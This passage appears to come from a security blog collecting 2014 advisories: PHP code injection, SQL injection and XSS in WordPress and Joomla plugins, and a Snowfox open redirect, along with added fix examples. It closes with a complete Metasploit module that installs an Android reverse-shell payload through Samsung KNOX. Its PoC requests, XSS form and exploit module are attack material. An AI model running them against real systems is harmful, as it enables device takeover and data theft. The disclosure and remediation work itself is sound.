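function cmdm_safe_filter(string $search_term): Closure {
    return function ($q) use ($search_term) {
        return $search_term;
    };
}

// Same shape as the advisory's CMDsearch=".phpinfo()." but with a harmless
// call, so the effect is visible without dumping server configuration.
$search_term = '".strrev("detucexe")."';

$vulnerable = cmdm_vulnerable_filter($search_term);
echo 'create_function() pattern returns: ', $vulnerable('unused'), PHP_EOL;

$safe = cmdm_safe_filter($search_term);
echo 'closure returns:                  ', $safe('unused'), PHP_EOL;

// In the plugin, the fix replaces the create_function() call with:
//   add_filter('get_search_query', cmdm_safe_filter($search_term), 99, 1);
```

The first line prints the result of strrev(), because the input was compiled and run as PHP; the second prints the input back as plain text. Any code path that builds PHP source from a request value (create_function, eval, preg_replace with the /e modifier) has the same problem, and the closure form is the idiomatic replacement on every PHP version still supported.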
 
::SOLUTION::
Update to version 2.0.4
 
::DISCLOSURE::
2014-11-08 initial vendor contact
2014-11-10 vendor response
2014-11-10 vendor confirmed 
2014-11-11 vendor release patch
2014-11-14 public disclosure
 
::REFERENCE::
https://downloadsmanager.cminds.com/release-notes/
http://www.itas.vn/news/code-injection-in-cm-download-manager-plugin-66.html?language=en
 
 
::COPYRIGHT::
Copyright (c) ITAS CORP 2014, All rights reserved worldwide. Permission is hereby granted for the electronic redistribution of this information. It is not to be edited or altered in any way without the express written consent of ITAS CORP.
 
::DISCLAIMER::
THE INFORMATION PRESENTED HEREIN IS PROVIDED "AS IS" WITHOUT WARRANTY OF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED TO, ANY IMPLIED WARRANTIES OF MERCHANTABILITY OR FITNESS FOR A PARTICULAR PURPOSE OR WARRANTIES OF QUALITY OR COMPLETENESS. THE INFORMATION PRESENTED HERE IS A SERVICE TO THE SECURITY COMMUNITY AND THE PRODUCT VENDORS. ANY APPLICATION OR DISTRIBUTION OF THIS INFORMATION CONSTITUTES ACCEPTANCE AS IS, AND AT THE USER'S OWN RISK.


22Nov/14

WordPress SP Client Document Manager 2.4.1 SQL Injection

Vulnerability title: Multiple SQL Injection in SP Client Document Manager plugin
Plugin: SP Client Document Manager
Vendor: http://smartypantsplugins.com
Product: https://wordpress.org/plugins/sp-client-document-manager/
Affected version: 2.4.1 and earlier
Fixed version: N/A
Google dork: inurl:wp-content/plugins/sp-client-document-manager
Reported by: Dang Quoc Thai - thai.q.dang (at) itas (dot) vn
Credits to ITAS Team - www.itas.vn
 
 
::DESCRIPTION::
 
Multiple SQL injection vulnerabilities have been found and confirmed within the software, exploitable as an anonymous user. A successful attack could allow an anonymous attacker to access information such as usernames and password hashes stored in the database. The following URLs and parameters have been confirmed to suffer from SQL injection: 
 
Link 1:
 
POST /wordpress/wp-content/plugins/sp-client-document-manager/ajax.php?function=email-vendor HTTP/1.1
Host: target.org
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0
Accept: text/html, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Referer: http://target.org/wordpress/?page_id=16
Cookie: wordpress_cbbb3ecca6306be6e41d05424d417f7b=test1%7C1414550777%7CxKIQf1812x9lfyhuFgNQQhmDtojDdEnDTfLisVHwnJ6%7Cc493b6c21a4a1916e2bc6076600939af5276b6feb09d06ecc043c37bd92a0748; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_cbbb3ecca6306be6e41d05424d417f7b=test1%7C1414550777%7CxKIQf1812x9lfyhuFgNQQhmDtojDdEnDTfLisVHwnJ6%7C7995fe13b1bbe0761cb05258e4e13b20b27cc9cedf3bc337440672353309e8a3; bp-activity-oldestpage=1
Connection: keep-alive
Content-Length: 33
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
 
vendor_email[]=<SQL Injection>
 
 
Vulnerable file:/wp-content/plugins/sp-client-document-manager/classes/ajax.php
Vulnerable code: (Line: 1516 -> 1530)
    function email_vendor()
    {
        global $wpdb, $current_user;
        if (count($_POST['vendor_email']) == 0) {
            echo '<p style="color:red;font-weight:bold">' . __("Please select at least one file!", "sp-cdm") . '</p>';
        } else {
            $files = implode(",", $_POST['vendor_email']);
            echo "SELECT *  FROM " . $wpdb->prefix . "sp_cu  WHERE id IN (" . $files . ")"."\n";
            $r     = $wpdb->get_results("SELECT *  FROM " . $wpdb->prefix . "sp_cu  WHERE id IN (" . $files . ")", ARRAY_A);
 
 
 
Link 2: http://target.org/wordpress/wp-content/plugins/sp-client-document-manager/ajax.php?function=download-project&id=<SQL Injection>
 
GET /wp-content/plugins/sp-client-document-manager/ajax.php?function=download-project&id=<SQL Injection> HTTP/1.1
Host: target.org
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=4f7eca4e8ea50fadba7209e47494f29c
Connection: keep-alive
 
Vulnerable file:/wp-content/plugins/sp-client-document-manager/classes/ajax.php
Vulnerable code: (Line: 1462 -> 1479)
 
function download_project()
    {
        global $wpdb, $current_user;
        $user_ID     = $_GET['id'];
        $r           = $wpdb->get_results("SELECT *  FROM " . $wpdb->prefix . "sp_cu   where pid = $user_ID  order by date desc", ARRAY_A);
        $r_project   = $wpdb->get_results("SELECT *  FROM " . $wpdb->prefix . "sp_cu_project where id = $user_ID  ", ARRAY_A);
        $return_file = "" . preg_replace('/[^\w\d_ -]/si', '', stripslashes($r_project[0]['name'])) . ".zip";
        $zip         = new Zip();
        $dir         = '' . SP_CDM_UPLOADS_DIR . '' . $r_project[0]['uid'] . '/';
        $path        = '' . SP_CDM_UPLOADS_DIR_URL . '' . $r_project[0]['uid'] . '/';
        //@unlink($dir.$return_file);
        for ($i = 0; $i < count($r); $i++) {
            $zip->addFile(file_get_contents($dir . $r[$i]['file']), $r[$i]['file'], filectime($dir . $r[$i]['file']));
        }
        $zip->finalize(); // as we are not using getZipData or getZipFile, we need to call finalize ourselves.
        $zip->setZipFile($dir . $return_file);
        header("Location: " . $path . $return_file . "");
    }
 
Link 3: http://target.org/wordpress/wp-content/plugins/sp-client-document-manager/ajax.php?function=download-archive&id=<SQL Injection>
 
GET /wp-content/plugins/sp-client-document-manager/ajax.php?function=download-archive&id=<SQL Injection> HTTP/1.1
Host: target.org
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=4f7eca4e8ea50fadba7209e47494f29c
Connection: keep-alive
Vulnerable file:/wp-content/plugins/sp-client-document-manager/classes/ajax.php
Vulnerable code: (Line: 1480 -> 1496)
 
 
function download_archive()
    {
        global $wpdb, $current_user;
        $user_ID     = $_GET['id'];
        $dir         = '' . SP_CDM_UPLOADS_DIR . '' . $user_ID . '/';
        $path        = '' . SP_CDM_UPLOADS_DIR_URL . '' . $user_ID . '/';
        $return_file = "Account.zip";
        $zip         = new Zip();
        $r           = $wpdb->get_results("SELECT *  FROM " . $wpdb->prefix . "sp_cu   where uid = $user_ID  order by date desc", ARRAY_A);
        //@unlink($dir.$return_file);
        for ($i = 0; $i < count($r); $i++) {
            $zip->addFile(file_get_contents($dir . $r[$i]['file']), $r[$i]['file'], filectime($dir . $r[$i]['file']));
        }
        $zip->finalize(); // as we are not using getZipData or getZipFile, we need to call finalize ourselves.
        $zip->setZipFile($dir . $return_file);
        header("Location: " . $path . $return_file . "");
    }
 
Link 4: http://target.org/wordpress/wp-content/plugins/sp-client-document-manager/ajax.php?function=remove-category&id=<SQL Injection>
 
GET /wp-content/plugins/sp-client-document-manager/ajax.php?function=remove-category&id=<SQL Injection> HTTP/1.1
Host: target.org
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=4f7eca4e8ea50fadba7209e47494f29c
Connection: keep-alive
 
Vulnerable file:/wp-content/plugins/sp-client-document-manager/classes/ajax.php
Vulnerable code: (Line: 368 -> 372)
 
    function remove_cat()
    {
        global $wpdb, $current_user;
        $wpdb->query("DELETE FROM " . $wpdb->prefix . "sp_cu_project WHERE id = " . $_REQUEST['id'] . "  ");
        $wpdb->query("DELETE FROM " . $wpdb->prefix . "sp_cu WHERE pid = " . $_REQUEST['id'] . "  ");
}  
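Each of the four handlers quoted above interpolates a request value straight into SQL ($_POST['vendor_email'] joined with implode(), $_GET['id'] and $_REQUEST['id'] dropped into WHERE clauses). Below is an added example, not the plugin's code and not part of the ITAS advisory, showing the same queries with every value bound through $wpdb->prepare(). It assumes a WordPress runtime (global $wpdb, ARRAY_A, check_ajax_referer(), current_user_can(), wp_die()); the function names and the nonce action 'spcdm_remove_cat' are mine. The access check in the last function reflects only what is visible above: none of the quoted handlers checks who is calling.

```php
<?php
// Added example, not the plugin's code and not from the ITAS advisory. The
// four queries quoted above, rewritten so that every request value is bound
// through $wpdb->prepare() instead of being concatenated into SQL. Assumes
// it runs inside WordPress (global $wpdb, ARRAY_A, check_ajax_referer,
// current_user_can, wp_die); the function names and the nonce action are mine.

/**
 * Reduce a request value such as $_POST['vendor_email'] to a list of
 * positive integer ids. Anything else (strings, negatives, SQL) is dropped.
 * Pure PHP, so it can be exercised outside WordPress.
 */
function spcdm_int_list($raw): array {
    $ids = [];
    foreach ((array) $raw as $value) {
        if (is_scalar($value) && preg_match('/^[1-9]\d*\z/', (string) $value)) {
            $ids[] = (int) $value;
        }
    }
    return array_values(array_unique($ids));
}

/** "%d,%d,%d" for N ids, so prepare() can bind an IN (...) list. */
function spcdm_in_placeholders(int $count): string {
    return implode(',', array_fill(0, $count, '%d'));
}

/** Link 1, email_vendor(): bound replacement for implode(",", $_POST['vendor_email']). */
function spcdm_files_by_ids(array $raw_ids): array {
    global $wpdb;
    $ids = spcdm_int_list($raw_ids);
    if ($ids === []) {
        return [];
    }
    $sql = $wpdb->prepare(
        "SELECT * FROM {$wpdb->prefix}sp_cu WHERE id IN (" . spcdm_in_placeholders(count($ids)) . ")",
        $ids   // prepare() accepts its arguments as one array
    );
    return $wpdb->get_results($sql, ARRAY_A);
}

/** Links 2 and 3, download_project()/download_archive(): one id bound with %d. */
function spcdm_files_where(string $column, int $id): array {
    global $wpdb;
    // Column names cannot be bound; restrict them to the two the code uses.
    if (!in_array($column, ['pid', 'uid'], true)) {
        return [];
    }
    return $wpdb->get_results(
        $wpdb->prepare("SELECT * FROM {$wpdb->prefix}sp_cu WHERE $column = %d ORDER BY date DESC", $id),
        ARRAY_A
    );
}

/** Link 4, remove_cat(): bound id, and the destructive action gated. */
function spcdm_remove_project(int $id): void {
    global $wpdb;
    // The quoted handlers run for any caller of ajax.php; a delete should
    // at least carry a nonce and require a capability.
    check_ajax_referer('spcdm_remove_cat');
    if (!current_user_can('manage_options')) {
        wp_die('Forbidden', '', ['response' => 403]);
    }
    $wpdb->query($wpdb->prepare("DELETE FROM {$wpdb->prefix}sp_cu_project WHERE id = %d", $id));
    $wpdb->query($wpdb->prepare("DELETE FROM {$wpdb->prefix}sp_cu WHERE pid = %d", $id));
}

// Call sites: the (int) cast happens before the value reaches any query.
//   $r = spcdm_files_by_ids($_POST['vendor_email'] ?? []);
//   $r = spcdm_files_where('pid', (int) ($_GET['id'] ?? 0));
//   spcdm_remove_project((int) ($_REQUEST['id'] ?? 0));
```

prepare() has no placeholder for a list, which is why the IN (...) case builds one %d per element; casting alone would also stop the injection in these four queries, but binding keeps the fix intact if a column is ever changed to a string type.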
 
 
::DISCLOSURE::
+ 10/30/2014: Notified vendor - no response
+ 11/05/2014: Notified vendor - no response
+ 11/08/2014: Notified vendor - vendor blocks IPs from Vietnam
+ 11/20/2014: Public disclosure
 
::REFERENCE::
https://www.youtube.com/watch?v=AR3xCcuEJHc
 
 
::DISCLAIMER::
THE INFORMATION PRESENTED HEREIN IS PROVIDED "AS IS" WITHOUT WARRANTY OF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED TO, ANY IMPLIED WARRANTIES OF MERCHANTABILITY OR FITNESS FOR A PARTICULAR PURPOSE OR WARRANTIES OF QUALITY OR COMPLETENESS. THE INFORMATION PRESENTED HERE IS A SERVICE TO THE SECURITY COMMUNITY AND THE PRODUCT VENDORS. ANY APPLICATION OR DISTRIBUTION OF THIS INFORMATION CONSTITUTES ACCEPTANCE AS IS, AND AT THE USER'S OWN RISK.


21Nov/14

WordPress 3.9.2 Cross Site Scripting

 
OVERVIEW
========
 
A security flaw in WordPress 3 allows injection of JavaScript into certain text fields. In particular, the problem affects comment boxes on WordPress posts and pages. These don't require authentication by default.
 
The JavaScript injected into a comment is executed when the target user views it, either on a blog post, a page, or in the Comments section of the administrative Dashboard.
 
In the most obvious scenario the attacker leaves a comment containing the JavaScript and some links in order to put the comment in the moderation queue. The exploit is not then visible to normal users, search engines, etc.
 
When a blog administrator goes to the Dashboard/Comments section to review new comments, the JavaScript gets executed. The script can then perform operations with administrator privileges.
 
For instance, our PoC exploits first clean up traces of the injected script from the database, then perform other administrative tasks such as changing the current user's password, adding a new administrator account, or using the plugin editor to write attacker-supplied PHP code on the server (this impact applies to any WordPress XSS if triggered by an administrator).
 
These operations happen in the background without the user seeing anything out of the ordinary.
 
If the attacker writes new PHP code on the server via the plugin editor, another AJAX request can be used to execute it instantaneously, whereby the attacker gains operating system level access on the server.
 
The exploit will NOT be triggered directly in the Dashboard "root view" because only snippets (the first 20 words) of the latest comments are shown there, with all HTML stripped.
 
If the comment is approved, the exploit will be triggered for any user viewing the targeted blog post or page, with their corresponding privileges.
 
Plugins that let unprivileged users enter HTML text may offer other attack vectors.
 
DETAILS
=======
 
WordPress allows a few HTML tags in comments, such as the anchor <A>, bold <B>, and code <CODE> tags. Certain white-listed attributes are allowed in each tag. Obviously, the "href" attribute is important for anchor tags, but e.g. the "onmouseover" attribute would be undesirable.
 
The problem occurs in a text formatting function called wptexturize() which is normally executed for each comment and other blocks of text. The function replaces certain simple characters with fancier HTML entities. For instance, straight quote symbols are replaced with opening and closing curly quotes, Unicode 8220 and 8221.
 
In order to avoid interfering with HTML formatting, wptexturize() first splits the text in segments. The splitting is expected to pick HTML tags (which aren't texturized) apart from running text (which is texturized).
 
In addition to HTML tags, the code is supposed to recognize square-bracketed shortcodes such as [CODE] and avoid texturizing them.
 
The splitting is implemented with a regular expression in
wp-includes/formatting.php:
 
   $textarr = preg_split('/(<.*>|\[.*\])/Us', $text, -1,
                         PREG_SPLIT_DELIM_CAPTURE);
 
A text containing carefully mixed square and angle brackets confuses the splitting process and results in HTML code getting partially texturized.
 
An attacker can exploit the bug to supply any attributes in the allowed HTML tags. A style attribute can be used to create a transparent tag covering the whole window, forcing the execution of its onmouseover handler.
 
In practical applications the script would probably first remove the transparent tag to avoid interfering with UI events and re-triggering the handler. It could then insert a new <SCRIPT> tag to load a more complex JavaScript file from another web server. This script can use e.g. jQuery to chain AJAX operations for posting HTML forms and retrieving the required nonces.
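To see the splitting go wrong, the added example below (not WordPress code and not from the Klikki advisory) runs the exact preg_split() quoted above and then applies a cut-down version of wptexturize()'s double-quote rewriting to the segments WordPress would treat as running text. The three inputs are constructed for this demonstration.

```php
<?php
// Added example; not WordPress code and not from the Klikki advisory. It
// re-runs the preg_split() from wp-includes/formatting.php quoted above and
// applies a reduced form of wptexturize()'s quote rewriting to the segments
// WordPress treats as running text. Sample inputs are constructed.

function split_like_wptexturize(string $text): array {
    // Verbatim from WordPress 3.9: U = ungreedy, s = dot matches newline.
    return preg_split('/(<.*>|\[.*\])/Us', $text, -1, PREG_SPLIT_DELIM_CAPTURE);
}

// Only the double-quote part of the texturizer: a quote after whitespace,
// start of text or an opening bracket becomes an opening curly quote,
// every other quote a closing one.
function texturize_quotes(string $segment): string {
    $segment = preg_replace('/(\s|\A|[([{<])"/', '$1&#8220;', $segment);
    return str_replace('"', '&#8221;', $segment);
}

function mini_wptexturize(string $text): string {
    $out = '';
    foreach (split_like_wptexturize($text) as $segment) {
        if ($segment === '') {
            continue;
        }
        // Same dispatch as WordPress: a segment starting with < is a tag and
        // one starting with [ is a shortcode; both are output unchanged.
        $first = $segment[0];
        if ($first === '<' || $first === '[') {
            $out .= $segment;
        } else {
            $out .= texturize_quotes($segment);
        }
    }
    return $out;
}

$samples = [
    // Plain text: quotes become curly, as intended.
    'He said "hi"',
    // Well-formed tag and shortcode: both are recognised and left untouched.
    '<a title="x" href="http://example.com/">x</a> [note]',
    // Mixed brackets: the [ ... ] alternative matches from the opening bracket
    // to the ] inside the title attribute, so the rest of the tag is treated
    // as text and its attribute quotes are rewritten.
    '[note <a title="]" href="http://example.com/">x</a>',
];

foreach ($samples as $in) {
    echo "IN : $in\nOUT: ", mini_wptexturize($in), "\n\n";
}
```

The first two inputs behave as intended: prose quotes become &#8220;/&#8221; entities and a well-formed tag or shortcode passes through untouched. In the third, the remainder of the `<a>` tag after the `]` lands in a text segment, so the quotes that delimit its href attribute come back as entities. That is the partial texturization the advisory describes: the attribute whitelist checked one set of attribute boundaries, and the browser parses a different one.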
 
AFFECTED VERSIONS
=================
 
We tested a few WordPress versions from 3.0 to the latest 3.9.2.
All tested versions were vulnerable.
The problem seems to have gone uncorrected for almost four years.
 
Version 4.0 uses a different kind of regular expression and is NOT vulnerable to this problem.
 
WORKAROUNDS
===========
 
Texturizing can be easily disabled by adding a return statement at the beginning of the function in wp-includes/formatting.php:
 
  function wptexturize($text) {
        return $text;                  // ADD THIS LINE
        global $wp_cockneyreplace;
 
This changes how some punctuation marks look, but the difference is quite minor.
 
We have also made a WordPress plugin available for disabling texturization. For more information and an up-to-date version of this document, please refer to our website http://klikki.fi
 
The preferred solution should be applying the official patch released by WordPress.
 
VENDOR RESPONSE
===============
 
WordPress was notified on September 26 and has released patches correcting the problem. The WordPress security advisory is available at
 
https://wordpress.org/news/2014/11/wordpress-4-0-1/
 
CREDITS
=======
 
The vulnerability was discovered and researched by Jouko Pynnonen, Klikki Oy, Finland.
 
--
Jouko Pynnonen <jouko@iki.fi>
Klikki Oy - http://klikki.fi


21Nov/14

Computer hijacking arrests in UK and across Europe


Fifteen people have been arrested, including four in the UK, in connection with the hijacking of computers.

Police say the individuals were using software designed to remotely control computers - allowing for the stealing of information.

The other arrests were made in Estonia, France, Romania, Latvia, Italy, and Norway.

The practice, which in some instances can grant access to a victim's webcam, is known as "Ratting".

The phrase takes its name from the malicious software used to gain control - Remote Access Trojans (Rats).

Using Rats to view people through their own webcams, without their knowledge, is becoming "increasingly common" according to the UK government-backed Get Safe Online advice website.

The National Crime Agency (NCA) said it arrested two 33-year-old men, and a 30-year-old woman, in Leeds.

A 20-year-old man was arrested in Chatham, Kent, while a 19-year-old man had his home searched in Liverpool and was brought in for "voluntary questioning".

They are all accused of knowingly using Rats to spy on multiple targets.

"Victims are typically infected by being convinced to click on a link purporting to be a picture or video, or disguised as a legitimate file, but is instead an installer for the Rat," the NCA explained in a statement.

"In many cases, those who unwittingly install such trojans will have no indication that their machine is infected."

Source: http://www.bbc.com/news/technology-30146176

20Nov/14

Joomla Simple Email Form 1.8.5 Cross Site Scripting

Advisory ID: HTB23241
Product: Simple Email Form Joomla Extension
Vendor: Doug Bierer
Vulnerable Version(s): 1.8.5 and probably prior
Tested Version: 1.8.5
Advisory Publication:  October 29, 2014  [without technical details]
Vendor Notification: October 29, 2014 
Public Disclosure: November 19, 2014 
Vulnerability Type: Cross-Site Scripting [CWE-79]
CVE Reference: CVE-2014-8539
Risk Level: Medium 
CVSSv2 Base Score: 4.3 (AV:N/AC:M/Au:N/C:N/I:P/A:N)
Solution Status: Solution Available
Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) 
 
-----------------------------------------------------------------------------------------------
 
Advisory Details:
 
High-Tech Bridge Security Research Lab discovered a vulnerability in the Simple Email Form Joomla Extension, which can be exploited to perform Cross-Site Scripting (XSS) attacks against visitors and administrators of Joomla websites with the plugin installed.
 
 
1) Reflected Cross-Site Scripting (XSS) in Simple Email Form Joomla Extension: CVE-2014-8539
 
Input passed via the "mod_simpleemailform_field2_1" HTTP POST parameter to the "/index.php" script is not properly sanitised before being returned to the user. A remote attacker can trick a logged-in user into opening a specially crafted link and execute arbitrary HTML and script code in the browser in the context of the vulnerable website.
 
The exploitation example below uses the "alert()" JavaScript function to display the word "immuniweb":
 
 
<form action="http://[host]/index.php" method="post" name="main">
<input type="hidden" name="mod_simpleemailform_field1_1" value="email@email.com">
<input type="hidden" name="mod_simpleemailform_field2_1" value='"><script>alert("immuniweb");</script>'>
<input type="hidden" name="mod_simpleemailform_submit_1" value="Submit">
<input type="submit" id="btn">
</form>
 
 
-----------------------------------------------------------------------------------------------
 
Solution:
 
Disclosure timeline:
2014-10-29 Vendor Alerted via emails.
2014-11-06 Vendor Alerted via emails.
2014-11-14 Fix Requested via emails.
2014-11-17 Fix Requested via emails.
2014-11-19 Public disclosure with self-written patch.
 
Currently we are not aware of any official solution for this vulnerability.
Unofficial patch was developed by High-Tech Bridge Security Research Lab and is available here: https://www.htbridge.com/advisory/HTB23241-patch.zip
 
-----------------------------------------------------------------------------------------------
 
References:
 
[1] High-Tech Bridge Advisory HTB23241 - https://www.htbridge.com/advisory/HTB23241 - Reflected Cross-Site Scripting (XSS) in Simple Email Form Joomla Extension.
[2] Simple Email Form Joomla Extension - http://extensions.joomla.org/extensions/contacts-and-feedback/contact-forms/11494 - Lightweight email contact form with 8 configurable fields, plus a field for uploading attachments to the email, and a CAPTCHA based in Text_CAPTCHA from the PEAR library (included).
[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures.
[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.
[5] ImmuniWeb® SaaS - https://www.htbridge.com/immuniweb/ - hybrid of manual web application penetration test and cutting-edge vulnerability scanner available online via a Software-as-a-Service (SaaS) model.
 
-----------------------------------------------------------------------------------------------
 
Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.


19Nov/14

Snowfox CMS 1.0 Open Redirect

Snowfox CMS v1.0 (rd param) Open Redirect Vulnerability
 
 
Vendor: Globiz Solutions
Product web page: http://www.snowfoxcms.org
Affected version: 1.0
 
Summary: Snowfox is an open source Content Management System (CMS)
that allows your website users to create and share content based
on permission configurations.
 
Desc: Input passed via the 'rd' GET parameter to the 'selectlanguage.class.php'
script is not properly verified before being used to redirect users. This
can be exploited to redirect a user to an arbitrary website, e.g. when a user
clicks a specially crafted link to the affected script hosted on a trusted
domain.
 
===========================================================================
\modules\system\controller\selectlanguage.class.php:
----------------------------------------------------
 
28: if ($results && isset($inputs['rd'])){
29:      header("location: ".$inputs['rd']);
30: }
31: return $results;
 
===========================================================================
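One way to close this, as an added example rather than Snowfox code: validate the 'rd' value before the header() call at line 29 so that only a path on the same site is ever used, and fall back to a fixed default otherwise. The function name is mine, and the sample values are constructed, apart from the zeroscience.mk URL, which is the value in the PoC link below.

```php
<?php
// Added example, not Snowfox code: a validator for the 'rd' value before it
// reaches header("Location: ...") in selectlanguage.class.php. Only a
// site-absolute path is accepted; anything else redirects to $default.
// Sample values are constructed, except the zeroscience.mk URL, which is
// the one in the advisory's PoC link.

function safe_redirect_target($rd, string $default = '/'): string {
    if (!is_string($rd) || $rd === '') {
        return $default;
    }
    // CR, LF or other control characters would let the value break out of
    // the Location header (header injection).
    if (preg_match('/[\x00-\x1f\x7f]/', $rd)) {
        return $default;
    }
    // Exactly one leading slash, not followed by "/" or "\": browsers read
    // "//host" and "/\host" as protocol-relative URLs to another site.
    if (!preg_match('#\A/(?![/\\\\])#', $rd)) {
        return $default;
    }
    // A bare path cannot carry a scheme or host; have parse_url() confirm it.
    $parts = parse_url($rd);
    if ($parts === false || isset($parts['scheme']) || isset($parts['host'])) {
        return $default;
    }
    return $rd;
}

$samples = [
    '/snowfox/?uri=user/profile',        // an in-site path
    'http://www.zeroscience.mk',         // the advisory's PoC value
    '//www.zeroscience.mk',              // protocol-relative form
    '/\\www.zeroscience.mk',             // backslash variant of the same
    "/snowfox/\r\nSet-Cookie: x=y",      // header-splitting attempt
    '',                                  // missing value
];

foreach ($samples as $rd) {
    printf("%-40s -> %s\n", json_encode($rd, JSON_UNESCAPED_SLASHES), safe_redirect_target($rd));
}

// Replacement for line 29 of the file quoted above:
//   header('Location: ' . safe_redirect_target($inputs['rd'] ?? null));
```

Only the first sample survives the checks; every other one is sent to the default. If the application genuinely needs to redirect to other hosts, compare the parsed host against a fixed allow list rather than against the Host request header, which the attacker also controls.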
 
Tested on: Apache/2.4.7 (Win32)
           PHP/5.5.6
           MySQL 5.6.14
 
 
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience
 
Advisory ID: ZSL-2014-5206
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2014-5206.php
 
12.11.2014
 
--
 
http://10.0.18.3/snowfox/?uri=user/select-language&formAction=submit&rd=http://www.zeroscience.mk&languageId=us-en


18Nov/14

Samsung Galaxy KNOX Android Browser Remote Code Execution

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
 
require 'msf/core'
require 'digest/md5'
 
class Metasploit3 < Msf::Exploit::Remote
 
  include Msf::Exploit::Remote::BrowserExploitServer
 
  # Hash that maps payload ID -> (0|1) if an HTTP request has
  # been made to download a payload of that ID
  attr_reader :served_payloads
 
  def initialize(info = {})
    super(update_info(info,
      'Name'                => 'Samsung Galaxy KNOX Android Browser RCE',
      'Description'         => %q{
        A vulnerability exists in the KNOX security component of the Samsung Galaxy
        firmware that allows a remote webpage to install an APK with arbitrary
        permissions by abusing the 'smdm://' protocol handler registered by the KNOX
        component.
 
        The vulnerability has been confirmed in the Samsung Galaxy S4, S5, Note 3,
        and Ace 4.
      },
      'License'             => MSF_LICENSE,
      'Author'              => [
        'Andre Moulu', # discovery and advisory
        'joev'   # msf module
      ],
      'References'          => [
        ['URL', 'http://blog.quarkslab.com/abusing-samsung-knox-to-remotely-install-a-malicious-application-story-of-a-half-patched-vulnerability.html'],
        ['OSVDB', '114590']
      ],
      'Platform'            => 'android',
      'Arch'                => ARCH_DALVIK,
      'DefaultOptions'      => { 'PAYLOAD' => 'android/meterpreter/reverse_tcp' },
      'Targets'             => [ [ 'Automatic', {} ] ],
      'DisclosureDate'      => 'Nov 12 2014',
      'DefaultTarget'       => 0,
 
      'BrowserRequirements' => {
        :source     => 'script',
        :os_name    => OperatingSystems::Match::ANDROID
      }
    ))
 
    register_options([
      OptString.new('APK_VERSION', [
        false, "The update version to advertise to the client", "1337"
      ])
    ], self.class)
 
    deregister_options('JsObfuscate')
  end
 
  def exploit
    @served_payloads = Hash.new(0)
    super
  end
 
  def apk_bytes
    payload.encoded
  end
 
  def on_request_uri(cli, req)
    if req.uri =~ /\/([a-zA-Z0-9]+)\.apk\/latest$/
      if req.method.upcase == 'HEAD'
        print_status "Serving metadata..."
        send_response(cli, '', magic_headers)
      else
        print_status "Serving payload '#{$1}'..."
        @served_payloads[$1] = 1
        send_response(cli, apk_bytes, magic_headers)
      end
    elsif req.uri =~ /_poll/
      vprint_debug "Polling #{req.qstring['id']}: #{@served_payloads[req.qstring['id']]}"
      send_response(cli, @served_payloads[req.qstring['id']].to_s, 'Content-type' => 'text/plain')
    elsif req.uri =~ /launch$/
      send_response_html(cli, launch_html)
    else
      super
    end
  end
 
  # The browser appears to be vulnerable, serve the exploit
  def on_request_exploit(cli, req, browser)
    print_status "Serving exploit..."
    send_response_html(cli, generate_html)
  end
 
  def magic_headers
    { 'Content-Length' => apk_bytes.length,
      'ETag' => Digest::MD5.hexdigest(apk_bytes),
      'x-amz-meta-apk-version' => datastore['APK_VERSION'] }
  end
 
  def generate_html
    %Q|
      <!doctype html>
      <html><body>
      <script>
      #{exploit_js}
      </script></body></html>
    |
  end
 
  def exploit_js
    payload_id = rand_word
 
    js_obfuscate %Q|
 
      function poll() {
        var xhr = new XMLHttpRequest();
        xhr.open('GET', '_poll?id=#{payload_id}&d='+Math.random()*999999999999);
        xhr.onreadystatechange = function(){
          if (xhr.readyState == 4) {
            if (xhr.responseText == '1') {
              setTimeout(killEnrollment, 100);
            } else {
              setTimeout(poll, 1000);
              setTimeout(enroll, 0);
              setTimeout(enroll, 500);
            }
          }
        };
        xhr.onerror = function(){
          setTimeout(poll, 1000);
          setTimeout(enroll, 0);
        };
        xhr.send();
      }
 
      function enroll() {
        var loc = window.location.href.replace(/[/.]$/g, '');
        top.location = 'smdm://#{rand_word}?update_url='+
          encodeURIComponent(loc)+'/#{payload_id}.apk';
      }
 
      function killEnrollment() {
        top.location = "intent://#{rand_word}?program="+
          "#{rand_word}/#Intent;scheme=smdm;launchFlags=268468256;end";
        setTimeout(launchApp, 300);
      }
 
      function launchApp() {
        top.location='intent:view#Intent;SEL;component=com.metasploit.stage/.MainActivity;end';
      }
 
      enroll();
      setTimeout(poll,600);
 
    |
  end
 
  def rand_word
    Rex::Text.rand_text_alphanumeric(3+rand(12))
  end
end
